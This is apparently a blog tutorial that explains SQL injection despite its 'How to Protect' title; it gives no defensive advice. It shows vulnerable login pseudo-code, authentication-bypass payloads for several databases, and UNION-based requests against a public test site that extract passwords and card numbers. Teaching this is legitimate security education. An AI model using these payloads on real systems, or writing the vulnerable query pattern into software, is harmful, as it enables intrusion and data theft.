Kali Linux

How to Protect website from SQL Injection Attack

How to Protect website from SQL Injection Attack
Written by Mubassir patel

How to Protect website from SQL Injection Attack

How to Protect website from SQL Injection Attack: SQL Injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application’s database server (also commonly referred to as a Relational Database Management System – RDBMS). Since an SQL Injection vulnerability could possibly affect any website or web application that makes use of a SQL-based database, the vulnerability is one of the oldest, most prevalent and most dangerous of web application vulnerabilities.

By leveraging an SQL Injection vulnerability, given the right circumstances, an attacker can use it to bypass a web application’s authentication and authorization mechanisms and retrieve the contents of an entire database.

How SQL Injection works

In order to fire the SQL injection command, we need to find input location.  In order for an SQL Injection attack to take place, the vulnerable website needs to directly include user input within an SQL statement.

The following server-side pseudo-code is used to authenticate users to the web application.

# Define POST variables
  uname = request.POST['username']
passwd = request.POST['password']

# SQL query vulnerable to SQLi
sql = “SELECT id FROM users WHERE username=’” + uname + “’ AND password=’” + passwd + “’”

# Execute the SQL statement
database.execute(sql)

 

A simple example of an SQL Injection payload could be something as simple as setting the password field too. password’ OR 1=1

This would result in the following SQL query being run against the database server.

SELECT id FROM users WHERE username=’username’ AND password=’passwordOR 1=1

An attacker can also comment out the rest of the SQL statement to control the execution of the SQL query further.

-- MySQL, MSSQL, Oracle, PostgreSQL, SQLite
' OR '1'='1' --
' OR '1'='1' /*
-- MySQL
' OR '1'='1' #
-- Access (using null characters)
' OR '1'='1' %00
' OR '1'='1' %16

What’s the worst an attacker can do with SQL?

We need to understand some tips for SQL Injection Attack:

  • An attacker can use SQL Injection to bypass authentication or even impersonate specific users.
  • One of SQL’s primary functions is to select data based on a query and output the result of that query. An SQL Injection vulnerability could allow the complete disclosure of data residing on a database server.
  •  An attacker could use an SQL Injection vulnerability to delete data from a database.

The anatomy of an SQL Injection attack

An SQL Injection needs just two conditions to exist.

1) a relational database that uses SQL.

 2) a user controllable input which is directly used in an SQL query.

We can filter data using UNION operator.

The following HTTP request is a normal request that a legitimate user would send.

GET http://testphp.vulnweb.com/artists.php?artist=1 HTTP/1.1
Host: testphp.vulnweb.com

 

HTTP request a legitimate user would send

Although the above request looks normal, the artist parameter in the GET request’s query string is vulnerable to SQL Injection.

GET http://testphp.vulnweb.com/artists.php?artist=-1 UNION SELECT 1, 2, 3 HTTP/1.1
Host: testphp.vulnweb.com

 

SQL injection using the UNION operator

GET http://testphp.vulnweb.com/artists.php?artist=-1 UNION SELECT 1,pass,cc FROM users WHERE uname='test' HTTP/1.1
Host: testphp.vulnweb.com

 

SQL injection using the UNION operator with a FROM clause

About the author

Mubassir patel

Mubassir is a founder and developer of this site. He is a computer science engineer. He has a very deep interest in ethical hacking, penetration testing, website development and including all technology topic.

Leave a Comment